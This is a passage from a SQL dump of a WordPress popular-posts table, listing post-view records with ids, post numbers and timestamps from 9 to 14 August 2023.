11:18:11'),(82397,5137,1,'2023-08-09','2023-08-09 11:18:13'),(82398,80,1,'2023-08-09','2023-08-09 11:18:22'),(82399,84,1,'2023-08-09','2023-08-09 11:20:46'),(82400,1872,1,'2023-08-09','2023-08-09 11:21:25'),(82401,1870,1,'2023-08-09','2023-08-09 11:21:45'),(82402,1872,1,'2023-08-09','2023-08-09 11:21:57'),(82403,84,1,'2023-08-09','2023-08-09 11:22:12'),(82404,4960,1,'2023-08-09','2023-08-09 11:28:01'),(82405,4960,1,'2023-08-09','2023-08-09 11:31:28'),(82406,5131,1,'2023-08-09','2023-08-09 11:36:11'),(82407,1614,1,'2023-08-09','2023-08-09 11:36:23'),(82408,1614,1,'2023-08-09','2023-08-09 11:36:48'),(82409,5046,1,'2023-08-09','2023-08-09 11:43:46'),(82410,1745,1,'2023-08-09','2023-08-09 11:44:44'),(82411,5268,1,'2023-08-09','2023-08-09 11:54:11'),(82412,5268,1,'2023-08-09','2023-08-09 11:54:13'),(82413,5320,1,'2023-08-09','2023-08-09 12:14:16'),(82414,5320,1,'2023-08-09','2023-08-09 12:14:17'),(82415,80,1,'2023-08-09','2023-08-09 12:14:57'),(82416,4612,1,'2023-08-09','2023-08-09 12:21:55'),(82417,5125,1,'2023-08-09','2023-08-09 12:24:27'),(82418,5125,1,'2023-08-09','2023-08-09 12:29:05'),(82419,5323,1,'2023-08-09','2023-08-09 12:34:20'),(82420,5323,1,'2023-08-09','2023-08-09 12:34:25'),(82421,1778,1,'2023-08-09','2023-08-09 12:40:01'),(82422,5122,1,'2023-08-09','2023-08-09 12:49:07'),(82423,5122,1,'2023-08-09','2023-08-09 12:49:09'),(82424,87,1,'2023-08-09','2023-08-09 12:49:23'),(82425,480,1,'2023-08-09','2023-08-09 12:50:45'),(82426,5334,1,'2023-08-09','2023-08-09 12:54:24'),(82427,5334,1,'2023-08-09','2023-08-09 12:54:26'),(82428,1594,1,'2023-08-09','2023-08-09 13:03:17'),(82429,5128,1,'2023-08-09','2023-08-09 13:09:17'),(82430,5128,1,'2023-08-09','2023-08-09 13:09:39'),(82431,3092,1,'2023-08-09','2023-08-09 13:20:42'),(82432,5134,1,'2023-08-09','2023-08-09 13:29:16'),(82433,5134,1,'2023-08-09','2023-08-09 13:29:18'),(82434,470,1,'2023-08-09','2023-08-09 13:49:22'),(82435,470,1,'2023-08-09','2023-08-09 13:49:23'),(82436,4657,1,'2023-08-09','2023-08-09 13:50:34'),(82437,4938,1,'2023-08-09','2023-08-09 13:57:36'),(82438,3083,1,'2023-08-09','2023-08-09 14:00:13'),(82439,4587,1,'2023-08-09','2023-08-09 14:09:45'),(82440,1602,1,'2023-08-09','2023-08-09 14:13:09'),(82441,1778,1,'2023-08-09','2023-08-09 14:15:37'),(82442,5119,1,'2023-08-09','2023-08-09 14:27:11'),(82443,4938,1,'2023-08-09','2023-08-09 14:35:08'),(82444,5046,1,'2023-08-09','2023-08-09 14:35:53'),(82445,474,1,'2023-08-09','2023-08-09 14:40:43'),(82446,4514,1,'2023-08-09','2023-08-09 14:51:24'),(82447,5320,1,'2023-08-09','2023-08-09 15:16:28'),(82448,5046,1,'2023-08-09','2023-08-09 15:26:01'),(82449,5280,1,'2023-08-09','2023-08-09 15:30:15'),(82450,4608,1,'2023-08-09','2023-08-09 15:36:30'),(82451,1606,1,'2023-08-09','2023-08-09 15:41:33'),(82452,5131,1,'2023-08-09','2023-08-09 15:55:54'),(82453,2558,1,'2023-08-09','2023-08-09 16:15:42'),(82454,4966,1,'2023-08-09','2023-08-09 16:46:51'),(82455,1602,1,'2023-08-09','2023-08-09 17:13:36'),(82456,5058,1,'2023-08-09','2023-08-09 17:49:45'),(82457,4911,1,'2023-08-09','2023-08-09 17:52:52'),(82458,4520,1,'2023-08-09','2023-08-09 17:55:32'),(82459,5122,1,'2023-08-09','2023-08-09 18:16:38'),(82460,5122,1,'2023-08-09','2023-08-09 18:55:57'),(82461,3307,1,'2023-08-09','2023-08-09 19:13:30'),(82462,4520,1,'2023-08-09','2023-08-09 19:33:24'),(82463,84,1,'2023-08-09','2023-08-09 19:43:02'),(82464,4966,1,'2023-08-09','2023-08-09 20:00:40'),(82465,84,1,'2023-08-09','2023-08-09 20:13:02'),(82466,4960,1,'2023-08-09','2023-08-09 20:28:34'),(82467,80,1,'2023-08-09','2023-08-09 21:18:55'),(82468,1778,1,'2023-08-09','2023-08-09 22:16:36'),(82469,5343,1,'2023-08-10','2023-08-10 01:15:46'),(82470,72,1,'2023-08-10','2023-08-10 02:07:24'),(82471,474,1,'2023-08-10','2023-08-10 02:17:40'),(82472,1718,1,'2023-08-10','2023-08-10 02:28:13'),(82473,4944,1,'2023-08-10','2023-08-10 02:28:14'),(82474,5280,1,'2023-08-10','2023-08-10 02:33:11'),(82475,5276,1,'2023-08-10','2023-08-10 03:00:47'),(82476,72,1,'2023-08-10','2023-08-10 03:25:21'),(82477,2751,1,'2023-08-10','2023-08-10 03:28:58'),(82478,1592,1,'2023-08-10','2023-08-10 03:37:11'),(82479,1610,1,'2023-08-10','2023-08-10 03:53:50'),(82480,4412,1,'2023-08-10','2023-08-10 04:11:07'),(82481,483,1,'2023-08-10','2023-08-10 04:27:49'),(82482,4703,1,'2023-08-10','2023-08-10 04:28:25'),(82483,2809,1,'2023-08-10','2023-08-10 04:45:44'),(82484,470,1,'2023-08-10','2023-08-10 05:03:03'),(82485,4551,1,'2023-08-10','2023-08-10 05:37:39'),(82486,3781,1,'2023-08-10','2023-08-10 06:20:18'),(82487,5314,1,'2023-08-10','2023-08-10 06:45:33'),(82488,470,1,'2023-08-10','2023-08-10 06:59:09'),(82489,1770,1,'2023-08-10','2023-08-10 07:08:32'),(82490,5314,1,'2023-08-10','2023-08-10 07:17:10'),(82491,4529,1,'2023-08-10','2023-08-10 07:32:19'),(82492,4753,1,'2023-08-10','2023-08-10 07:35:21'),(82493,483,1,'2023-08-10','2023-08-10 07:47:48'),(82494,1602,1,'2023-08-10','2023-08-10 07:59:56'),(82495,1600,1,'2023-08-10','2023-08-10 08:16:25'),(82496,4983,1,'2023-08-10','2023-08-10 08:20:02'),(82497,4520,1,'2023-08-10','2023-08-10 08:25:40'),(82498,1606,1,'2023-08-10','2023-08-10 09:06:14'),(82499,4960,1,'2023-08-10','2023-08-10 09:20:27'),(82500,4977,1,'2023-08-10','2023-08-10 09:26:35'),(82501,5076,1,'2023-08-10','2023-08-10 09:34:11'),(82502,5334,1,'2023-08-10','2023-08-10 09:45:33'),(82503,5359,1,'2023-08-10','2023-08-10 10:02:55'),(82504,5314,1,'2023-08-10','2023-08-10 10:03:49'),(82505,5298,1,'2023-08-10','2023-08-10 10:04:55'),(82506,3781,1,'2023-08-10','2023-08-10 10:26:08'),(82507,1770,1,'2023-08-10','2023-08-10 11:03:20'),(82508,4911,1,'2023-08-10','2023-08-10 11:11:59'),(82509,5163,1,'2023-08-10','2023-08-10 11:16:56'),(82510,4938,1,'2023-08-10','2023-08-10 11:21:32'),(82511,5359,1,'2023-08-10','2023-08-10 11:45:11'),(82512,4608,1,'2023-08-10','2023-08-10 11:59:22'),(82513,5280,1,'2023-08-10','2023-08-10 13:41:14'),(82514,474,1,'2023-08-10','2023-08-10 14:05:53'),(82515,1594,1,'2023-08-10','2023-08-10 14:26:03'),(82516,3092,1,'2023-08-10','2023-08-10 14:40:59'),(82517,5163,1,'2023-08-10','2023-08-10 14:41:03'),(82518,5323,1,'2023-08-10','2023-08-10 14:43:25'),(82519,2457,1,'2023-08-10','2023-08-10 15:09:06'),(82520,1739,1,'2023-08-10','2023-08-10 15:30:51'),(82521,4960,1,'2023-08-10','2023-08-10 15:45:22'),(82522,1586,1,'2023-08-10','2023-08-10 16:04:50'),(82523,1586,1,'2023-08-10','2023-08-10 16:28:30'),(82524,1586,1,'2023-08-10','2023-08-10 16:40:19'),(82525,5122,1,'2023-08-10','2023-08-10 16:57:11'),(82526,89,1,'2023-08-10','2023-08-10 17:04:02'),(82527,2801,1,'2023-08-10','2023-08-10 17:15:52'),(82528,4685,1,'2023-08-10','2023-08-10 17:19:58'),(82529,1739,1,'2023-08-10','2023-08-10 17:39:32'),(82530,1739,1,'2023-08-10','2023-08-10 17:51:31'),(82531,5307,1,'2023-08-10','2023-08-10 18:37:15'),(82532,4960,1,'2023-08-10','2023-08-10 18:47:51'),(82533,4960,1,'2023-08-10','2023-08-10 19:08:15'),(82534,2801,1,'2023-08-10','2023-08-10 19:10:07'),(82535,4566,1,'2023-08-10','2023-08-10 20:42:00'),(82536,4612,1,'2023-08-10','2023-08-10 20:56:14'),(82537,4612,1,'2023-08-10','2023-08-10 21:07:45'),(82538,4963,1,'2023-08-10','2023-08-10 21:29:34'),(82539,4963,1,'2023-08-10','2023-08-10 21:31:18'),(82540,89,1,'2023-08-10','2023-08-10 21:33:02'),(82541,89,1,'2023-08-10','2023-08-10 21:34:37'),(82542,89,1,'2023-08-10','2023-08-10 21:35:26'),(82543,5033,1,'2023-08-10','2023-08-10 21:35:55'),(82544,5271,1,'2023-08-10','2023-08-10 21:48:26'),(82545,2419,1,'2023-08-10','2023-08-10 22:56:03'),(82546,4938,1,'2023-08-10','2023-08-10 23:58:00'),(82547,4520,1,'2023-08-11','2023-08-11 00:18:28'),(82548,1594,1,'2023-08-11','2023-08-11 00:27:00'),(82549,1594,1,'2023-08-11','2023-08-11 01:36:13'),(82550,5271,1,'2023-08-11','2023-08-11 02:18:17'),(82551,4332,1,'2023-08-11','2023-08-11 02:42:11'),(82552,4950,1,'2023-08-11','2023-08-11 03:01:09'),(82553,3771,1,'2023-08-11','2023-08-11 03:21:31'),(82554,5119,1,'2023-08-11','2023-08-11 03:42:23'),(82555,3664,1,'2023-08-11','2023-08-11 03:52:22'),(82556,1594,1,'2023-08-11','2023-08-11 04:16:37'),(82557,2419,1,'2023-08-11','2023-08-11 04:33:27'),(82558,5119,1,'2023-08-11','2023-08-11 05:36:12'),(82559,1594,1,'2023-08-11','2023-08-11 06:15:28'),(82560,1722,1,'2023-08-11','2023-08-11 06:45:07'),(82561,1600,1,'2023-08-11','2023-08-11 06:45:22'),(82562,2809,1,'2023-08-11','2023-08-11 07:30:22'),(82563,5101,1,'2023-08-11','2023-08-11 08:15:22'),(82564,4960,1,'2023-08-11','2023-08-11 08:17:56'),(82565,5163,1,'2023-08-11','2023-08-11 08:27:07'),(82566,3764,1,'2023-08-11','2023-08-11 09:00:40'),(82567,4529,1,'2023-08-11','2023-08-11 09:22:46'),(82568,2148,1,'2023-08-11','2023-08-11 09:48:49'),(82569,91,1,'2023-08-11','2023-08-11 09:49:20'),(82570,2148,1,'2023-08-11','2023-08-11 09:50:18'),(82571,1728,1,'2023-08-11','2023-08-11 09:50:28'),(82572,76,1,'2023-08-11','2023-08-11 10:00:31'),(82573,1766,1,'2023-08-11','2023-08-11 10:45:28'),(82574,2420,1,'2023-08-11','2023-08-11 11:30:29'),(82575,4960,1,'2023-08-11','2023-08-11 12:27:22'),(82576,80,1,'2023-08-11','2023-08-11 12:53:35'),(82577,68,1,'2023-08-11','2023-08-11 12:53:56'),(82578,80,1,'2023-08-11','2023-08-11 12:54:48'),(82579,4960,1,'2023-08-11','2023-08-11 13:07:02'),(82580,2165,1,'2023-08-11','2023-08-11 13:24:46'),(82581,473,1,'2023-08-11','2023-08-11 13:42:48'),(82582,487,1,'2023-08-11','2023-08-11 13:42:48'),(82583,473,1,'2023-08-11','2023-08-11 13:43:00'),(82584,487,1,'2023-08-11','2023-08-11 13:43:00'),(82585,4576,1,'2023-08-11','2023-08-11 13:43:19'),(82586,3045,1,'2023-08-11','2023-08-11 13:47:34'),(82587,2989,1,'2023-08-11','2023-08-11 13:49:58'),(82588,1586,1,'2023-08-11','2023-08-11 13:50:01'),(82589,5128,1,'2023-08-11','2023-08-11 13:54:02'),(82590,2617,1,'2023-08-11','2023-08-11 13:55:34'),(82591,4980,1,'2023-08-11','2023-08-11 13:58:07'),(82592,1598,1,'2023-08-11','2023-08-11 13:59:39'),(82593,5314,1,'2023-08-11','2023-08-11 14:06:17'),(82594,72,1,'2023-08-11','2023-08-11 14:07:53'),(82595,1610,1,'2023-08-11','2023-08-11 14:12:26'),(82596,4753,1,'2023-08-11','2023-08-11 14:21:58'),(82597,2420,1,'2023-08-11','2023-08-11 14:24:15'),(82598,4520,1,'2023-08-11','2023-08-11 14:25:19'),(82599,1586,1,'2023-08-11','2023-08-11 14:32:22'),(82600,5289,1,'2023-08-11','2023-08-11 14:34:55'),(82601,5163,1,'2023-08-11','2023-08-11 14:54:11'),(82602,3090,1,'2023-08-11','2023-08-11 14:57:24'),(82603,1774,1,'2023-08-11','2023-08-11 15:06:19'),(82604,2809,1,'2023-08-11','2023-08-11 15:09:19'),(82605,5163,1,'2023-08-11','2023-08-11 15:11:14'),(82606,5071,1,'2023-08-11','2023-08-11 15:17:59'),(82607,4893,1,'2023-08-11','2023-08-11 15:19:22'),(82608,2704,1,'2023-08-11','2023-08-11 15:31:34'),(82609,3104,1,'2023-08-11','2023-08-11 15:32:00'),(82610,2704,1,'2023-08-11','2023-08-11 15:35:49'),(82611,4412,1,'2023-08-11','2023-08-11 15:43:40'),(82612,474,1,'2023-08-11','2023-08-11 15:44:54'),(82613,68,1,'2023-08-11','2023-08-11 16:04:40'),(82614,4301,1,'2023-08-11','2023-08-11 16:17:48'),(82615,4301,1,'2023-08-11','2023-08-11 16:19:45'),(82616,1598,1,'2023-08-11','2023-08-11 16:19:50'),(82617,1766,1,'2023-08-11','2023-08-11 16:28:35'),(82618,3764,1,'2023-08-11','2023-08-11 16:41:19'),(82619,76,1,'2023-08-11','2023-08-11 16:57:57'),(82620,4960,1,'2023-08-11','2023-08-11 16:58:21'),(82621,5320,1,'2023-08-11','2023-08-11 17:01:30'),(82622,3030,1,'2023-08-11','2023-08-11 17:09:49'),(82623,2165,1,'2023-08-11','2023-08-11 17:21:48'),(82624,3764,1,'2023-08-11','2023-08-11 17:27:56'),(82625,4960,1,'2023-08-11','2023-08-11 17:45:11'),(82626,2801,1,'2023-08-11','2023-08-11 18:46:46'),(82627,4893,1,'2023-08-11','2023-08-11 19:14:51'),(82628,4977,1,'2023-08-11','2023-08-11 19:17:56'),(82629,4911,1,'2023-08-11','2023-08-11 19:44:31'),(82630,1586,1,'2023-08-11','2023-08-11 19:53:18'),(82631,1586,1,'2023-08-11','2023-08-11 20:16:47'),(82632,3694,1,'2023-08-11','2023-08-11 20:28:55'),(82633,3041,1,'2023-08-11','2023-08-11 21:01:52'),(82634,5289,1,'2023-08-11','2023-08-11 21:44:30'),(82635,4753,1,'2023-08-11','2023-08-11 21:45:26'),(82636,4753,1,'2023-08-11','2023-08-11 21:45:27'),(82637,5317,1,'2023-08-11','2023-08-11 21:49:52'),(82638,5317,1,'2023-08-11','2023-08-11 21:49:53'),(82639,1604,1,'2023-08-11','2023-08-11 21:56:51'),(82640,4976,1,'2023-08-11','2023-08-11 22:15:26'),(82641,4976,1,'2023-08-11','2023-08-11 22:15:28'),(82642,5314,1,'2023-08-11','2023-08-11 22:19:52'),(82643,5314,1,'2023-08-11','2023-08-11 22:19:54'),(82644,72,1,'2023-08-11','2023-08-11 22:31:53'),(82645,4977,1,'2023-08-11','2023-08-11 22:45:26'),(82646,4977,1,'2023-08-11','2023-08-11 22:46:23'),(82647,1718,1,'2023-08-11','2023-08-11 22:51:25'),(82648,4983,1,'2023-08-11','2023-08-11 23:15:26'),(82649,4983,1,'2023-08-11','2023-08-11 23:15:28'),(82650,3004,1,'2023-08-11','2023-08-11 23:28:44'),(82651,474,1,'2023-08-12','2023-08-12 00:45:28'),(82652,474,1,'2023-08-12','2023-08-12 00:45:29'),(82653,4977,1,'2023-08-12','2023-08-12 01:18:48'),(82654,468,1,'2023-08-12','2023-08-12 01:24:54'),(82655,1774,1,'2023-08-12','2023-08-12 01:44:20'),(82656,4938,1,'2023-08-12','2023-08-12 01:44:22'),(82657,1778,1,'2023-08-12','2023-08-12 01:52:48'),(82658,3746,1,'2023-08-12','2023-08-12 02:00:43'),(82659,4963,1,'2023-08-12','2023-08-12 02:12:40'),(82660,4738,1,'2023-08-12','2023-08-12 02:48:31'),(82661,1608,1,'2023-08-12','2023-08-12 02:50:34'),(82662,3090,1,'2023-08-12','2023-08-12 03:05:53'),(82663,335,1,'2023-08-12','2023-08-12 03:14:24'),(82664,474,1,'2023-08-12','2023-08-12 03:22:36'),(82665,5280,1,'2023-08-12','2023-08-12 03:51:06'),(82666,1582,1,'2023-08-12','2023-08-12 03:52:01'),(82667,4802,1,'2023-08-12','2023-08-12 04:16:45'),(82668,1703,1,'2023-08-12','2023-08-12 04:29:03'),(82669,468,1,'2023-08-12','2023-08-12 04:44:20'),(82670,1582,1,'2023-08-12','2023-08-12 06:43:23'),(82671,4759,1,'2023-08-12','2023-08-12 09:57:23'),(82672,2609,1,'2023-08-12','2023-08-12 09:57:28'),(82673,5001,1,'2023-08-12','2023-08-12 10:08:08'),(82674,1703,1,'2023-08-12','2023-08-12 10:19:55'),(82675,1612,1,'2023-08-12','2023-08-12 10:42:25'),(82676,2956,1,'2023-08-12','2023-08-12 11:06:48'),(82677,1586,1,'2023-08-12','2023-08-12 11:37:24'),(82678,1582,1,'2023-08-12','2023-08-12 11:41:38'),(82679,4412,1,'2023-08-12','2023-08-12 12:09:39'),(82680,4556,1,'2023-08-12','2023-08-12 12:37:48'),(82681,1582,1,'2023-08-12','2023-08-12 13:07:26'),(82682,4911,1,'2023-08-12','2023-08-12 13:20:00'),(82683,4911,1,'2023-08-12','2023-08-12 13:21:44'),(82684,4420,1,'2023-08-12','2023-08-12 13:53:09'),(82685,2813,1,'2023-08-12','2023-08-12 14:44:58'),(82686,1586,1,'2023-08-12','2023-08-12 14:56:35'),(82687,473,1,'2023-08-12','2023-08-12 15:52:01'),(82688,487,1,'2023-08-12','2023-08-12 15:57:22'),(82689,2801,1,'2023-08-12','2023-08-12 16:12:24'),(82690,1612,1,'2023-08-12','2023-08-12 16:13:45'),(82691,1592,1,'2023-08-12','2023-08-12 16:33:07'),(82692,3117,1,'2023-08-12','2023-08-12 16:36:15'),(82693,5128,1,'2023-08-12','2023-08-12 16:41:13'),(82694,3117,1,'2023-08-12','2023-08-12 18:39:27'),(82695,3430,1,'2023-08-12','2023-08-12 19:26:26'),(82696,3124,1,'2023-08-12','2023-08-12 20:03:57'),(82697,4520,1,'2023-08-12','2023-08-12 21:13:59'),(82698,1870,1,'2023-08-12','2023-08-12 21:23:40'),(82699,3124,1,'2023-08-12','2023-08-12 21:37:44'),(82700,1602,1,'2023-08-12','2023-08-12 21:44:00'),(82701,1596,1,'2023-08-12','2023-08-12 21:49:18'),(82702,1582,1,'2023-08-12','2023-08-12 21:51:47'),(82703,3764,1,'2023-08-12','2023-08-12 22:26:24'),(82704,1594,1,'2023-08-12','2023-08-12 23:49:13'),(82705,1594,1,'2023-08-13','2023-08-13 00:04:35'),(82706,3045,1,'2023-08-13','2023-08-13 00:05:12'),(82707,4412,1,'2023-08-13','2023-08-13 00:19:30'),(82708,468,1,'2023-08-13','2023-08-13 00:25:59'),(82709,5125,1,'2023-08-13','2023-08-13 00:56:51'),(82710,72,1,'2023-08-13','2023-08-13 01:01:06'),(82711,1594,1,'2023-08-13','2023-08-13 01:15:00'),(82712,2558,1,'2023-08-13','2023-08-13 01:17:25'),(82713,3479,1,'2023-08-13','2023-08-13 01:33:45'),(82714,3069,1,'2023-08-13','2023-08-13 01:42:36'),(82715,5153,1,'2023-08-13','2023-08-13 01:42:41'),(82716,1870,1,'2023-08-13','2023-08-13 01:47:17'),(82717,4703,1,'2023-08-13','2023-08-13 01:49:17'),(82718,5058,1,'2023-08-13','2023-08-13 01:49:24'),(82719,4980,1,'2023-08-13','2023-08-13 01:56:42'),(82720,4983,1,'2023-08-13','2023-08-13 01:57:25'),(82721,468,1,'2023-08-13','2023-08-13 01:58:41'),(82722,2617,1,'2023-08-13','2023-08-13 02:06:43'),(82723,3127,1,'2023-08-13','2023-08-13 02:10:59'),(82724,1586,1,'2023-08-13','2023-08-13 02:25:19'),(82725,570,1,'2023-08-13','2023-08-13 02:28:25'),(82726,3731,1,'2023-08-13','2023-08-13 02:31:40'),(82727,1604,1,'2023-08-13','2023-08-13 02:38:55'),(82728,3721,1,'2023-08-13','2023-08-13 02:51:08'),(82729,473,1,'2023-08-13','2023-08-13 03:03:22'),(82730,3083,1,'2023-08-13','2023-08-13 03:12:37'),(82731,2178,1,'2023-08-13','2023-08-13 03:15:35'),(82732,335,1,'2023-08-13','2023-08-13 03:19:18'),(82733,4747,1,'2023-08-13','2023-08-13 03:27:49'),(82734,5256,1,'2023-08-13','2023-08-13 03:28:29'),(82735,4637,1,'2023-08-13','2023-08-13 03:28:32'),(82736,89,1,'2023-08-13','2023-08-13 03:45:51'),(82737,1602,1,'2023-08-13','2023-08-13 03:50:06'),(82738,4750,1,'2023-08-13','2023-08-13 04:03:47'),(82739,1586,1,'2023-08-13','2023-08-13 04:20:08'),(82740,3479,1,'2023-08-13','2023-08-13 04:21:48'),(82741,2904,1,'2023-08-13','2023-08-13 04:37:47'),(82742,3127,1,'2023-08-13','2023-08-13 04:39:49'),(82743,4944,1,'2023-08-13','2023-08-13 05:41:45'),(82744,1608,1,'2023-08-13','2023-08-13 05:47:34'),(82745,2704,1,'2023-08-13','2023-08-13 06:34:29'),(82746,2704,1,'2023-08-13','2023-08-13 06:34:59'),(82747,4747,1,'2023-08-13','2023-08-13 07:53:37'),(82748,4988,1,'2023-08-13','2023-08-13 07:56:38'),(82749,4988,1,'2023-08-13','2023-08-13 07:56:40'),(82750,4768,1,'2023-08-13','2023-08-13 08:50:35'),(82751,4768,1,'2023-08-13','2023-08-13 08:50:36'),(82752,4750,1,'2023-08-13','2023-08-13 08:56:38'),(82753,3764,1,'2023-08-13','2023-08-13 08:58:09'),(82754,487,1,'2023-08-13','2023-08-13 09:05:36'),(82755,487,1,'2023-08-13','2023-08-13 09:05:37'),(82756,89,1,'2023-08-13','2023-08-13 09:11:47'),(82757,4980,1,'2023-08-13','2023-08-13 09:20:37'),(82758,4930,1,'2023-08-13','2023-08-13 09:26:43'),(82759,4930,1,'2023-08-13','2023-08-13 09:26:44'),(82760,4977,1,'2023-08-13','2023-08-13 09:29:40'),(82761,4703,1,'2023-08-13','2023-08-13 09:29:44'),(82762,4700,1,'2023-08-13','2023-08-13 09:29:49'),(82763,4944,1,'2023-08-13','2023-08-13 09:29:53'),(82764,3072,1,'2023-08-13','2023-08-13 09:29:58'),(82765,5137,1,'2023-08-13','2023-08-13 09:30:00'),(82766,3781,1,'2023-08-13','2023-08-13 09:30:32'),(82767,4759,1,'2023-08-13','2023-08-13 09:35:34'),(82768,4759,1,'2023-08-13','2023-08-13 09:35:36'),(82769,473,1,'2023-08-13','2023-08-13 09:50:36'),(82770,473,1,'2023-08-13','2023-08-13 09:50:41'),(82771,2751,1,'2023-08-13','2023-08-13 09:51:43'),(82772,3117,1,'2023-08-13','2023-08-13 09:55:38'),(82773,5125,1,'2023-08-13','2023-08-13 09:57:02'),(82774,468,1,'2023-08-13','2023-08-13 10:13:06'),(82775,3781,1,'2023-08-13','2023-08-13 10:14:14'),(82776,473,1,'2023-08-13','2023-08-13 10:59:12'),(82777,473,1,'2023-08-13','2023-08-13 11:00:00'),(82778,1594,1,'2023-08-13','2023-08-13 11:21:57'),(82779,4612,1,'2023-08-13','2023-08-13 11:43:36'),(82780,2178,1,'2023-08-13','2023-08-13 11:44:28'),(82781,4691,1,'2023-08-13','2023-08-13 11:46:15'),(82782,1586,1,'2023-08-13','2023-08-13 12:12:00'),(82783,3083,1,'2023-08-13','2023-08-13 12:46:07'),(82784,4768,1,'2023-08-13','2023-08-13 12:51:02'),(82785,4408,1,'2023-08-13','2023-08-13 13:16:14'),(82786,5271,1,'2023-08-13','2023-08-13 13:19:57'),(82787,1544,1,'2023-08-13','2023-08-13 13:21:39'),(82788,4612,1,'2023-08-13','2023-08-13 13:40:37'),(82789,2801,1,'2023-08-13','2023-08-13 13:45:07'),(82790,3069,1,'2023-08-13','2023-08-13 13:45:09'),(82791,1588,1,'2023-08-13','2023-08-13 13:47:01'),(82792,72,1,'2023-08-13','2023-08-13 13:57:29'),(82793,4520,1,'2023-08-13','2023-08-13 13:58:49'),(82794,5071,1,'2023-08-13','2023-08-13 14:07:54'),(82795,2178,1,'2023-08-13','2023-08-13 14:18:18'),(82796,4944,1,'2023-08-13','2023-08-13 14:19:45'),(82797,2956,1,'2023-08-13','2023-08-13 14:38:24'),(82798,3313,1,'2023-08-13','2023-08-13 14:39:09'),(82799,5334,1,'2023-08-13','2023-08-13 14:39:18'),(82800,4412,1,'2023-08-13','2023-08-13 14:44:13'),(82801,72,1,'2023-08-13','2023-08-13 14:54:12'),(82802,5353,1,'2023-08-13','2023-08-13 14:55:12'),(82803,5353,1,'2023-08-13','2023-08-13 14:56:46'),(82804,4785,1,'2023-08-13','2023-08-13 15:09:09'),(82805,3280,1,'2023-08-13','2023-08-13 15:18:11'),(82806,1544,1,'2023-08-13','2023-08-13 15:55:09'),(82807,4612,1,'2023-08-13','2023-08-13 15:57:12'),(82808,3313,1,'2023-08-13','2023-08-13 16:27:11'),(82809,1586,1,'2023-08-13','2023-08-13 16:44:08'),(82810,3313,1,'2023-08-13','2023-08-13 17:01:08'),(82811,4911,1,'2023-08-13','2023-08-13 17:18:08'),(82812,1544,1,'2023-08-13','2023-08-13 17:35:09'),(82813,1582,1,'2023-08-13','2023-08-13 17:41:52'),(82814,473,1,'2023-08-13','2023-08-13 18:56:04'),(82815,468,1,'2023-08-13','2023-08-13 19:05:06'),(82816,1544,1,'2023-08-13','2023-08-13 19:10:16'),(82817,4911,1,'2023-08-13','2023-08-13 20:51:30'),(82818,468,1,'2023-08-13','2023-08-13 21:39:46'),(82819,2775,1,'2023-08-13','2023-08-13 21:39:48'),(82820,4542,1,'2023-08-13','2023-08-13 22:05:06'),(82821,5317,1,'2023-08-13','2023-08-13 22:43:45'),(82822,3290,1,'2023-08-13','2023-08-13 22:50:07'),(82823,1728,1,'2023-08-14','2023-08-14 00:18:23'),(82824,4412,1,'2023-08-14','2023-08-14 01:03:22'),(82825,4963,1,'2023-08-14','2023-08-14 01:17:13'),(82826,4750,1,'2023-08-14','2023-08-14 02:49:34'),(82827,5058,1,'2023-08-14','2023-08-14 02:49:36'),(82828,1604,1,'2023-08-14','2023-08-14 02:55:59'),(82829,3691,1,'2023-08-14','2023-08-14 03:43:36'),(82830,5163,1,'2023-08-14','2023-08-14 04:11:22'),(82831,3290,1,'2023-08-14','2023-08-14 04:28:40'),(82832,1728,1,'2023-08-14','2023-08-14 04:57:44'),(82833,3280,1,'2023-08-14','2023-08-14 05:26:46'),(82834,3764,1,'2023-08-14','2023-08-14 06:25:13'),(82835,4520,1,'2023-08-14','2023-08-14 06:30:07'),(82836,4685,1,'2023-08-14','2023-08-14 06:30:12'),(82837,3691,1,'2023-08-14','2023-08-14 06:37:06'),(82838,3781,1,'2023-08-14','2023-08-14 07:30:04'),(82839,3280,1,'2023-08-14','2023-08-14 08:05:27'),(82840,3764,1,'2023-08-14','2023-08-14 08:34:41'),(82841,1745,1,'2023-08-14','2023-08-14 08:47:05'),(82842,5276,1,'2023-08-14','2023-08-14 08:57:27'),(82843,4412,1,'2023-08-14','2023-08-14 09:00:05'),(82844,5163,1,'2023-08-14','2023-08-14 09:01:26'),(82845,1870,1,'2023-08-14','2023-08-14 09:02:53'),(82846,5163,1,'2023-08-14','2023-08-14 09:03:20'),(82847,72,1,'2023-08-14','2023-08-14 09:23:48'),(82848,1596,1,'2023-08-14','2023-08-14 09:42:03');
INSERT INTO `wp_popularpostssummary` VALUES (82849,1582,1,'2023-08-14','2023-08-14 09:49:03'),(82850,3030,1,'2023-08-14','2023-08-14 09:55:06'),(82851,5037,1,'2023-08-14','2023-08-14 10:14:41'),(82852,4960,1,'2023-08-14','2023-08-14 10:50:32'),(82853,2904,1,'2023-08-14','2023-08-14 10:51:05'),(82854,72,1,'2023-08-14','2023-08-14 11:11:28'),(82855,5346,1,'2023-08-14','2023-08-14 11:11:35'),(82856,72,1,'2023-08-14','2023-08-14 11:16:56'),(82857,5371,1,'2023-08-14','2023-08-14 11:17:05'),(82858,2911,1,'2023-08-14','2023-08-14 11:55:18'),(82859,3290,1,'2023-08-14','2023-08-14 11:58:04'),(82860,5163,1,'2023-08-14','2023-08-14 12:09:54'),(82861,1728,1,'2023-08-14','2023-08-14 12:33:07'),(82862,1594,1,'2023-08-14','2023-08-14 13:30:27'),(82863,3060,1,'2023-08-14','2023-08-14 13:34:32'),(82864,4930,1,'2023-08-14','2023-08-14 13:40:52'),(82865,3764,1,'2023-08-14','2023-08-14 13:41:41'),(82866,1770,1,'2023-08-14','2023-08-14 14:14:15'),(82867,5163,1,'2023-08-14','2023-08-14 14:37:42'),(82868,1872,1,'2023-08-14','2023-08-14 14:58:12'),(82869,4768,1,'2023-08-14','2023-08-14 15:03:37'),(82870,4960,1,'2023-08-14','2023-08-14 15:32:56'),(82871,3285,1,'2023-08-14','2023-08-14 16:19:59'),(82872,4768,1,'2023-08-14','2023-08-14 16:33:34'),(82873,1600,1,'2023-08-14','2023-08-14 17:02:38'),(82874,1770,1,'2023-08-14','2023-08-14 17:14:26'),(82875,3023,1,'2023-08-14','2023-08-14 17:41:44'),(82876,1724,1,'2023-08-14','2023-08-14 17:47:53'),(82877,80,1,'2023-08-14','2023-08-14 18:05:23'),(82878,3781,1,'2023-08-14','2023-08-14 18:08:57'),(82879,469,1,'2023-08-14','2023-08-14 18:36:29'),(82880,4938,1,'2023-08-14','2023-08-14 18:54:16'),(82881,4960,1,'2023-08-14','2023-08-14 